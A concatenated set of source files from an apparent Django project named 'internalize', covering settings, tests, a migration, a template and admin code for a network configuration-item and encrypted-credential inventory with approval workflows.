"\"\"\"\nDjango settings for internalize project.\n\nGenerated by 'django-admin startproject' using Django 3.1.5.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/3.2/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/3.2/ref/settings/\n\"\"\"\n\nimport django_heroku\nimport os\nfrom pathlib import Path\nfrom django.contrib.messages import constants as messages\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', '_zkf47_u&6yyr+b5wq_q0^_@+)%1nrl^vf=)+m4ut@%(^w_jco')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = int(os.environ.get('DEBUG', 1))\n\n# 'ALLOWED_HOSTS' should be a single string of hosts with a space between each.\n# For example: 'ALLOWED_HOSTS=127.0.0.1 [::1]'\nALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', '127.0.0.1 [::1]').split(' ')\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n # 3rd party\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'crispy_forms',\n 'debug_toolbar',\n 'django_extensions',\n\n # Local\n 'accounts',\n 'cis',\n]\n\nMIDDLEWARE = [\n # Simplified static file serving.\n # https://warehouse.python.org/project/whitenoise/\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n]\n\nROOT_URLCONF = 'internalize.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [BASE_DIR / 'templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'internalize.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.2/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": os.environ.get(\"SQL_ENGINE\", \"django.db.backends.sqlite3\"),\n \"NAME\": os.environ.get(\"SQL_DATABASE\", BASE_DIR / \"db.sqlite3\"),\n \"USER\": os.environ.get(\"SQL_USER\", \"user\"),\n \"PASSWORD\": os.environ.get(\"SQL_PASSWORD\", \"password\"),\n \"HOST\": os.environ.get(\"SQL_HOST\", \"localhost\"),\n \"PORT\": os.environ.get(\"SQL_PORT\", \"5432\"),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nAUTH_USER_MODEL = 'accounts.User'\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.2/topics/i18n/\n\nLANGUAGE_CODE = 'pt-br'\n\nTIME_ZONE = 'America/Sao_Paulo'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.2/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATIC_ROOT = BASE_DIR / 'staticfiles'\n\n# Extra places for collectstatic to find static files.\nSTATICFILES_DIRS = (BASE_DIR / 'static',)\n\n\n# Simplified static file serving.\n# https://warehouse.python.org/project/whitenoise/\nSTATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'\n\n\n# Default primary key field type\n# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\n\n# allauth\n\nif DEBUG:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n \"django.contrib.auth.backends.ModelBackend\",\n\n # `allauth` specific authentication methods, such as login by e-mail\n \"allauth.account.auth_backends.AuthenticationBackend\",\n)\n\nSITE_ID = 1\n\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_SIGNUP_PASSWORD_ENTER_TWICE = False\nACCOUNT_SESSION_REMEMBER = True\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_CONFIRM_EMAIL_ON_GET = True\n\nLOGIN_REDIRECT_URL = 'homepage'\n\nACCOUNT_LOGOUT_REDIRECT_URL = 'homepage'\n\n\nMESSAGE_TAGS = {\n messages.DEBUG: 'alert-info',\n messages.INFO: 'alert-info',\n messages.SUCCESS: 'alert-success',\n messages.WARNING: 'alert-warning',\n messages.ERROR: 'alert-danger',\n}\n\n\n# Debug Toolbar\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#configuring-internal-ips\nINTERNAL_IPS = ['127.0.0.1']\n\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\n\n# Sets a strict policy to disable many potentially privacy-invading and annoying features for all scripts.\n# https://pypi.org/project/django-permissions-policy/\n\nPERMISSIONS_POLICY = {\n \"accelerometer\": [],\n \"ambient-light-sensor\": [],\n \"autoplay\": [],\n \"camera\": [],\n \"document-domain\": [],\n \"encrypted-media\": [],\n \"fullscreen\": [],\n \"geolocation\": [],\n \"gyroscope\": [],\n \"interest-cohort\": [],\n \"magnetometer\": [],\n \"microphone\": [],\n \"midi\": [],\n \"payment\": [],\n \"usb\": [],\n}\n\n\n# Activate Django-Heroku.\ndjango_heroku.settings(locals())\n" }, { "alpha_fraction": 0.6313775777816772, "alphanum_fraction": 0.6424927115440369, "avg_line_length": 30.9069766998291, "blob_id": "3f5428938561df93bfbe5f4776a03926a80930a9", "content_id": "568204ec71b9db7da05760b02fdc19166200aedd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5488, "license_type": "no_license", "max_line_length": 82, "num_lines": 172, "path": "/cis/tests/tests_models.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.shortcuts import reverse\nfrom django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom accounts.models import User\nfrom ..models import Client, Place, Manufacturer, Contract, Appliance, CI, CIPack\n\nCLIENT_NAME = 'Client A'\nPLACE_NAME = 'Main'\nMANUFACTURER = 'Cisco Systems'\nCONTRACT_NAME = 'BR-001'\n\n\nclass FixtureMixin:\n \"\"\"Add the same fixture to all TestCase\"\"\"\n\n fixtures = ['all.json']\n\n\nclass ClientTest(FixtureMixin, TestCase):\n\n def test_client_as_string_returns_name(self):\n client = Client.objects.get(pk=1)\n self.assertEqual(str(client), CLIENT_NAME)\n\n def test_duplicate_name_raises_exception(self):\n with self.assertRaises(IntegrityError):\n Client.objects.create(name=CLIENT_NAME)\n\n\nclass PlaceTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_client_plus_place_name(self):\n place = Place.objects.get(pk=1)\n self.assertEqual(str(place), f'{CLIENT_NAME} | {PLACE_NAME}')\n\n def test_duplicate_name_by_client_raises_exception(self):\n client = Client.objects.get(pk=1)\n with self.assertRaises(IntegrityError):\n Place.objects.create(name=PLACE_NAME, client=client)\n\n def test_duplicate_name_different_client_is_ok(self):\n client = Client.objects.create(name='Different Client')\n self.assertIsNotNone(Place.objects.create(name=PLACE_NAME, client=client))\n\n def test_absolute_url_returns_correct_url(self):\n place = Place.objects.get(pk=1)\n self.assertEqual(\n place.get_absolute_url(),\n reverse('cis:place_update', args=[place.pk])\n )\n\n\nclass ManufacturerTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_name(self):\n manufacturer = Manufacturer.objects.get(pk=1)\n self.assertEqual(str(manufacturer), MANUFACTURER)\n\n def test_duplicate_name_raises_exception(self):\n with self.assertRaises(IntegrityError):\n Manufacturer.objects.create(name=MANUFACTURER)\n\n\nclass ContractTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_name(self):\n contract = Contract.objects.get(pk=1)\n self.assertEqual(str(contract), CONTRACT_NAME)\n\n\nclass ApplianceTest(FixtureMixin, TestCase):\n\n def test_as_string_returns_full_name(self):\n appliance = Appliance.objects.get(pk=1)\n self.assertEqual(\n str(appliance),\n f'{MANUFACTURER} | {appliance.model} | {appliance.serial_number}'\n )\n\n def test_duplicate_serial_number_raises_exception(self):\n appliance = Appliance.objects.get(pk=1)\n appliance.pk = None\n with self.assertRaises(IntegrityError):\n appliance.save()\n\n def test_absolute_url_returns_correct_url(self):\n appliance = Appliance.objects.get(pk=1)\n self.assertEqual(\n appliance.get_absolute_url(),\n reverse('cis:appliance_update', args=[appliance.pk])\n )\n\n\nclass CITest(FixtureMixin, TestCase):\n\n def test_as_string_returns_full_name(self):\n ci = CI.objects.get(pk=1)\n self.assertEqual(\n str(ci),\n f'{CLIENT_NAME} | {PLACE_NAME} | {ci.hostname} | {ci.ip}'\n )\n\n def test_unique_constraint_raises_exception(self):\n ci = CI.objects.get(pk=1)\n ci.pk = None\n ci.credential_id = None\n with self.assertRaises(IntegrityError):\n ci.save()\n\n def test_duplicate_hostname_with_different_client_is_ok(self):\n new_client = Client.objects.create(name='Different Client')\n ci = CI.objects.get(pk=1)\n ci.pk = None\n ci.credential_id = None\n ci.client = new_client\n ci.save()\n self.assertIsNotNone(ci.pk)\n\n def test_absolute_url_returns_correct_url(self):\n ci = CI.objects.get(pk=1)\n self.assertEqual(\n ci.get_absolute_url(),\n reverse('cis:ci_detail', args=[ci.pk])\n )\n\n\nclass CIPackTest(FixtureMixin, TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.admin = User.objects.get(pk=2)\n cls.user = User.objects.get(pk=1)\n cls.pack = CIPack.objects.get(pk=1)\n cls.cis = CI.objects.all()\n\n def test_as_string_returns_responsible_plus_local_data(self):\n self.assertEqual(\n str(self.pack),\n f\"{self.user} 2021-04-20 09:25:38\" # UTC-3\n )\n\n def test_percentage_of_cis_approved(self):\n # Approve 0 of 3 CIs\n self.assertEqual(self.pack.percentage_of_cis_approved, 0)\n\n # Approve 1 of 3 CIs\n self.pack.ci_set.filter(pk__in=(1,)).update(status=2)\n self.assertEqual(self.pack.percentage_of_cis_approved, 33)\n\n # Approve 2 of 3 CIs\n self.pack.ci_set.filter(pk__in=(1, 2)).update(status=2)\n self.assertEqual(self.pack.percentage_of_cis_approved, 67)\n\n # Approve 3 of 3 CIs\n self.pack.ci_set.filter(pk__in=(1, 2, 3)).update(status=2)\n self.assertEqual(self.pack.percentage_of_cis_approved, 100)\n\n def test_approved_by_returns_the_right_superuser(self):\n self.pack.approved_by = self.admin\n self.pack.save()\n self.assertEqual(self.pack.approved_by, self.admin)\n\n def test_send_cis_to_production(self):\n ci_pks = (ci.pk for ci in self.cis)\n self.pack.send_to_production(ci_pks)\n\n for ci in self.pack.ci_set.all():\n self.assertEqual(ci.status, 1)\n\n def test_len_returns_count_of_ci_set(self):\n self.assertEqual(len(self.pack), 3)\n" }, { "alpha_fraction": 0.5570608377456665, "alphanum_fraction": 0.5882893204689026, "avg_line_length": 32.5, "blob_id": "06a4ebfc281765016667bf7bc3622e6a8a98d088", "content_id": "eb5ddf49ca5670415aa681ec69f1568927163228", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4355, "license_type": "no_license", "max_line_length": 74, "num_lines": 130, "path": "/cis/tests/tests_loader.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from pathlib import Path\nfrom collections import namedtuple\nfrom openpyxl import Workbook\nfrom django.test import TestCase\n\nfrom accounts.models import User\nfrom ..models import Client, Place, Contract, Manufacturer\nfrom ..loader import CILoader\nfrom ..cis_mapping import CIS_SHEET, \\\n APPLIANCES_SHEET\n\nSPREADSHEET_FILE = 'cis_test.xlsx'\nCLIENT_NAME = 'New Client'\n\n\nclass CILoaderTest(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n create_workbook()\n cls.company_client = Client.objects.create(name=CLIENT_NAME)\n cls.loader = CILoader(SPREADSHEET_FILE, cls.company_client).save()\n\n @classmethod\n def tearDownClass(cls):\n Path(SPREADSHEET_FILE).unlink()\n super().tearDownClass()\n\n def test_return_correct_client_object(self):\n self.assertIsInstance(self.loader.client, Client)\n self.assertEqual(self.loader.client.name, CLIENT_NAME)\n\n def test_return_correct_site_objects(self):\n sites = self.loader.places\n keys = {'NY1', 'NY2', 'SP', 'BH'}\n for k, site in sites.items():\n self.assertIn(k, keys)\n self.assertIsInstance(site, Place)\n\n def test_return_correct_contract_objects(self):\n contracts = self.loader.contracts\n keys = {'SP-001', 'BH-001', 'NY-001', 'NY-002'}\n for k, contract in contracts.items():\n self.assertIn(k, keys)\n self.assertIsInstance(contract, Contract)\n\n def test_return_correct_manufacture_objects(self):\n manufacturers = self.loader.manufacturers\n keys = {'Cisco', 'F5'}\n for k, manufacturer in manufacturers.items():\n self.assertIn(k, keys)\n self.assertIsInstance(manufacturer, Manufacturer)\n\n def test_loader_contains_correct_number_of_cis(self):\n self.assertEqual(len(self.loader.cis), 5)\n\n def test_errors_contain_duplicated_items(self):\n create_workbook()\n loader = CILoader(SPREADSHEET_FILE, self.company_client).save()\n self.assertEqual(len(loader.errors), 5)\n self.assertEqual(len(loader.cis), 0)\n self.assertTrue(\n 'unique constraint' in str(loader.errors[0].exc).lower()\n )\n\n\ndef create_workbook():\n wb = Workbook()\n set_cis_sheet(wb)\n set_appliances_sheet(wb)\n wb.save(filename=SPREADSHEET_FILE)\n\n\ndef set_cis_sheet(workbook):\n cis_sheet = workbook.create_sheet(CIS_SHEET)\n Row = namedtuple('Row', (\n 'hostname',\n 'ip',\n 'description',\n 'deployed',\n 'business_impact',\n 'site',\n 'site_description',\n 'contract',\n 'contract_begin',\n 'contract_end',\n 'contract_description',\n 'username',\n 'password',\n 'enable_password',\n 'instructions',\n ))\n base = Row('router_sp', '172.16.5.10', 'Main Router',\n 'x', 'high', 'SP', 'Center', 'SP-001',\n '2021-01-01', '2022-01-01', 'Contract Details',\n 'admin', 'admin', 'enable', 'Instructions')\n rows = (\n Row._fields,\n base,\n base._replace(hostname='router_bh', ip='172.16.6.10',\n site='BH', contract='BH-001'),\n base._replace(hostname='wlc1', ip='172.16.10.10',\n description='Controller Floor 1', site='NY1',\n site_description='Main', contract='NY-001'),\n base._replace(hostname='wlc2', ip='172.16.10.11',\n description='Controller Floor 2', site='NY2',\n site_description='Secondary', contract='NY-002'),\n base._replace(hostname='fw', ip='10.10.20.20',\n description='Firewall'),\n )\n for row in rows:\n cis_sheet.append(row)\n\n\ndef set_appliances_sheet(workbook):\n appliances_sheet = workbook.create_sheet(APPLIANCES_SHEET)\n Row = namedtuple('ApplianceRow', (\n 'ci_hostname', 'serial_number', 'manufacture', 'model', 'virtual',\n ))\n rows = (\n Row._fields,\n Row('wlc1', 'FOX123', 'Cisco', '3560', 'x'),\n Row('wlc1', 'FOX124', 'Cisco', '3560', 'x'),\n Row('wlc2', 'FOX125', 'Cisco', '3560', 'x'),\n Row('router_sp', 'TYF987', 'Cisco', '2960', 'x'),\n Row('router_bh', 'TYF654', 'Cisco', '2960', 'x'),\n Row('fw', '687F', 'F5', 'BIG-IP', ''),\n )\n for row in rows:\n appliances_sheet.append(row)\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5904762148857117, "avg_line_length": 20, "blob_id": "8924796e059cecc7e0b0bc5aa32b9c9bae569a94", "content_id": "72e13a284caad51753e85c65256ac903a7cace27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 210, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/cis/templates/cis/manufacturer_detail.html", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "{% extends \"base_generic.html\" %}\n\n{% block title %}{{ manufacturer }}{% endblock %}\n\n{% block content %}\n<h1 class=\"h5 my-4\">{{ manufacturer }}</h1>\n\n<p>Number of CIs: {{ num_appliances }}</p>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.5527235269546509, "alphanum_fraction": 0.5616509318351746, "avg_line_length": 45.84242248535156, "blob_id": "7abad356aafec4affb2bdd218c03cd86c88ec59e", "content_id": "1087fdbd290d3920872eac6dc9cbaebe7e54b1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7729, "license_type": "no_license", "max_line_length": 234, "num_lines": 165, "path": "/cis/migrations/0001_initial.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-04-28 17:16\n\nfrom django.conf import settings\nimport django.core.validators\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport fernet_fields.fields\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Client',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50, unique=True)),\n ],\n options={\n 'ordering': ['name'],\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Contract',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100, unique=True)),\n ('begin', models.DateField()),\n ('end', models.DateField()),\n ('description', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='Credential',\n fields=[\n ('credential_id', models.AutoField(primary_key=True, serialize=False)),\n ('username', fernet_fields.fields.EncryptedCharField(max_length=50)),\n ('password', fernet_fields.fields.EncryptedCharField(max_length=50)),\n ('enable_password', fernet_fields.fields.EncryptedCharField(max_length=50)),\n ('instructions', fernet_fields.fields.EncryptedCharField(blank=True, max_length=255, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='ISP',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50, unique=True)),\n ],\n options={\n 'ordering': ['name'],\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Manufacturer',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50, unique=True)),\n ],\n options={\n 'ordering': ['name'],\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='CI',\n fields=[\n ('credential_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='cis.credential')),\n ('hostname', models.CharField(max_length=50)),\n ('ip', models.GenericIPAddressField()),\n ('description', models.CharField(max_length=255)),\n ('deployed', models.BooleanField(default=False)),\n ('business_impact', models.PositiveSmallIntegerField(choices=[(0, 'low'), (1, 'medium'), (2, 'high')], default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(2)])),\n ('status', models.PositiveSmallIntegerField(choices=[(0, 'created'), (1, 'sent'), (2, 'approved')], default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(2)])),\n ],\n options={\n 'ordering': ['hostname'],\n },\n bases=('cis.credential',),\n ),\n migrations.CreateModel(\n name='Place',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('description', models.CharField(blank=True, max_length=255, null=True)),\n ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.client')),\n ],\n ),\n migrations.CreateModel(\n name='Circuit',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('identifier', models.CharField(max_length=50)),\n ('bandwidth', models.CharField(max_length=10)),\n ('type', models.CharField(max_length=50)),\n ('description', models.CharField(max_length=255)),\n ('isp', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.isp')),\n ('place', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.place')),\n ],\n ),\n migrations.CreateModel(\n name='CIPack',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('sent_at', models.DateTimeField(auto_now_add=True, null=True)),\n ('approved_by', models.ForeignKey(limit_choices_to={'is_superuser': True}, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='cipacks_approved', to=settings.AUTH_USER_MODEL)),\n ('responsible', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Appliance',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('serial_number', models.CharField(max_length=255, unique=True)),\n ('model', models.CharField(max_length=100)),\n ('virtual', models.BooleanField(default=False)),\n ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.client')),\n ('manufacturer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='cis.manufacturer')),\n ],\n options={\n 'ordering': ['serial_number'],\n },\n ),\n migrations.AddConstraint(\n model_name='place',\n constraint=models.UniqueConstraint(fields=('client', 'name'), name='unique_client_place_name'),\n ),\n migrations.AddField(\n model_name='ci',\n name='appliances',\n field=models.ManyToManyField(to='cis.Appliance'),\n ),\n migrations.AddField(\n model_name='ci',\n name='client',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.client'),\n ),\n migrations.AddField(\n model_name='ci',\n name='contract',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='cis.contract'),\n ),\n migrations.AddField(\n model_name='ci',\n name='pack',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='cis.cipack'),\n ),\n migrations.AddField(\n model_name='ci',\n name='place',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cis.place'),\n ),\n migrations.AddConstraint(\n model_name='ci',\n constraint=models.UniqueConstraint(fields=('client', 'hostname', 'ip', 'description'), name='unique_client_hostname_ip_description'),\n ),\n ]\n" }, { "alpha_fraction": 0.5953741669654846, "alphanum_fraction": 0.596038818359375, "avg_line_length": 32.140968322753906, "blob_id": "71784eb58319ae0e8c879772480ea283ecf0aa44", "content_id": "534dc862c01eea20b97e93b9064fe12c66589464", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7523, "license_type": "no_license", "max_line_length": 98, "num_lines": 227, "path": "/cis/admin.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.contrib import admin, messages\nfrom django.contrib.admin import AdminSite\nfrom django.db import DatabaseError, transaction\nfrom django.db.models import QuerySet\nfrom django.urls import reverse\nfrom django.utils.html import format_html\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ngettext\n\nfrom .models import (\n Client, Place, ISP, Circuit,\n CI, Manufacturer, Appliance, Contract, CIPack\n)\n\n\nSITE = 'Internalize'\nAdminSite.site_header = SITE\nAdminSite.site_title = SITE\n\n\nclass ClientLinkMixin:\n \"\"\"Add the Client name as a link\"\"\"\n\n @admin.display(description='Client', ordering='client__name')\n def client_link(self, obj):\n url = f'{reverse(\"admin:cis_client_change\", args={obj.client.pk})}'\n return format_html('<a href=\"{}\">{}</a>', url, obj.client.name)\n\n\nclass PlaceInline(admin.TabularInline):\n model = Place\n extra = 1\n\n\[email protected](Client)\nclass ClientAdmin(admin.ModelAdmin):\n list_display = ('name', 'view_places')\n search_fields = ('name', 'place__name')\n view_on_site = False\n inlines = (PlaceInline,)\n\n @admin.display(description='Places')\n def view_places(self, obj):\n places = obj.place_set.all()\n places_link_list = ['<ul>']\n for place in places:\n url = f'{reverse(\"admin:cis_place_change\", args={place.pk})}'\n safe_link = format_html('<a href=\"{}\">{}</a>', url, place.name)\n places_link_list.append(f'<li>{safe_link}</li>')\n places_link_list.append('</ul>')\n return mark_safe('\\n'.join(places_link_list))\n\n\nclass CIInline(admin.TabularInline):\n model = CI\n extra = 0\n max_num = 0 # prevents the link `add another` from appearing\n fields = ('description', 'deployed', 'business_impact', 'contract', 'status', 'pack')\n readonly_fields = ('description', 'deployed', 'business_impact', 'contract', 'status', 'pack')\n show_change_link = True\n\n\[email protected](Place)\nclass PlaceAdmin(admin.ModelAdmin, ClientLinkMixin):\n list_display = ('name', 'client_link', 'description')\n list_filter = ('client',)\n list_editable = ('description',)\n search_fields = ('name', 'client__name', 'description')\n inlines = (CIInline,)\n\n\[email protected](Appliance)\nclass ApplianceAdmin(admin.ModelAdmin, ClientLinkMixin):\n list_display = (\n 'serial_number',\n 'client_link',\n 'manufacturer_link',\n 'model',\n 'virtual',\n )\n list_filter = ('client', 'manufacturer', 'virtual')\n list_editable = ('model', 'virtual')\n search_fields = ('serial_number', 'model', 'client', 'manufacturer')\n #autocomplete_fields = ('client', 'manufacturer')\n\n @admin.display(description='Manufacturer', ordering='manufacturer__name')\n def manufacturer_link(self, obj):\n url = f'{reverse(\"admin:cis_manufacturer_change\", args={obj.manufacturer.pk})}'\n return format_html('<a href=\"{}\">{}</a>', url, obj.manufacturer.name)\n\n\nclass ApplianceInline(admin.TabularInline):\n model = Appliance\n extra = 1\n\n\[email protected](Manufacturer)\nclass ManufacturerAdmin(admin.ModelAdmin):\n list_display = ('name', 'view_appliances')\n search_fields = ('name',)\n inlines = (ApplianceInline,)\n\n @admin.display(description='Appliances')\n def view_appliances(self, obj):\n count = obj.appliance_set.count()\n url = f'{reverse(\"admin:cis_appliance_changelist\")}?manufacturer__id__exact={obj.pk}'\n return format_html('<a href=\"{}\">{} Appliances</a>', url, count)\n\n\[email protected](Contract)\nclass ContractAdmin(admin.ModelAdmin):\n FIELDS = ('name', 'begin', 'end', 'description')\n\n date_hierarchy = 'begin'\n list_display = FIELDS\n list_filter = ('begin', 'end')\n search_fields = FIELDS\n inlines = (CIInline,)\n\n\[email protected](CI)\nclass CIAdmin(admin.ModelAdmin, ClientLinkMixin):\n list_display = (\n 'hostname',\n 'client_link',\n 'place_link',\n 'ip',\n 'description',\n 'deployed',\n 'business_impact',\n 'contract',\n 'status',\n 'view_appliances',\n 'pack',\n )\n list_filter = ('pack', 'status', 'client__name', 'place', 'deployed', 'contract')\n actions = ['approve_selected_cis']\n readonly_fields = ('status',)\n fieldsets = (\n ('Client', {'fields': ((), ('client', 'place',))}),\n ('Configuration Item', {'fields': (\n 'appliances',\n ('hostname', 'ip', 'deployed'),\n ('description', 'business_impact'),\n )}),\n ('Contract', {'fields': ('contract',)}),\n ('Credentials', {\n 'fields': (\n (),\n ('username', 'password', 'enable_password', 'instructions')),\n 'classes': ('collapse',),\n }),\n ('Management', {\n 'fields': ('status',),\n })\n )\n filter_horizontal = ('appliances',)\n list_editable = (\n 'ip',\n 'description',\n 'deployed',\n 'business_impact',\n )\n list_select_related = ('contract', 'client', 'place', 'pack')\n\n @admin.display(description='Place', ordering='place__name')\n def place_link(self, obj):\n url = f'{reverse(\"admin:cis_place_change\", args={obj.place.pk})}'\n return format_html('<a href=\"{}\">{}</a>', url, obj.place.name)\n\n @admin.display(description='Appliances')\n def view_appliances(self, obj):\n count = obj.appliances.count()\n url = f'{reverse(\"admin:cis_appliance_changelist\")}?ci__exact={obj.pk}'\n return format_html('<a href=\"{}\">{} Appliances</a>', url, count)\n\n @admin.action(description='Mark selected CIs as approved')\n def approve_selected_cis(self, request, queryset: QuerySet):\n # todo Write test\n pack_ids = set(queryset.values_list('pack', flat=True))\n try:\n with transaction.atomic():\n count = queryset.update(status=2)\n CIPack.objects.filter(pk__in=pack_ids).update(approved_by=request.user)\n self.message_user(\n request,\n ngettext(\n 'The selected CI was approved successfully.',\n 'The selected CIs were approved successfully.',\n count\n ),\n level=messages.SUCCESS,\n )\n except DatabaseError as e:\n raise DatabaseError(f'An error occurred during the approval: {e}')\n\n\[email protected](CIPack)\nclass CIPackAdmin(admin.ModelAdmin):\n FIELDS = ('sent_at', 'responsible', 'percentage_of_cis_approved', 'approved_by')\n\n list_display = FIELDS\n actions = ['approve_all_cis']\n list_filter = ('responsible', 'sent_at', 'approved_by')\n readonly_fields = FIELDS\n inlines = (CIInline,)\n\n @admin.action(description=\"Approve all CIs of selected CIPacks\")\n def approve_all_cis(self, request, queryset: QuerySet):\n try:\n with transaction.atomic():\n for pack in queryset:\n pack.approve_all_cis()\n self.message_user(\n request,\n ngettext(\n 'The selected CI pack was approved successfully.',\n 'The selected CI packs were approved successfully.',\n len(queryset)\n ),\n level=messages.SUCCESS,\n )\n except DatabaseError as e:\n raise DatabaseError(f'An error occurred during the approval: {e}')\n\n# admin.site.register(ISP)\n# 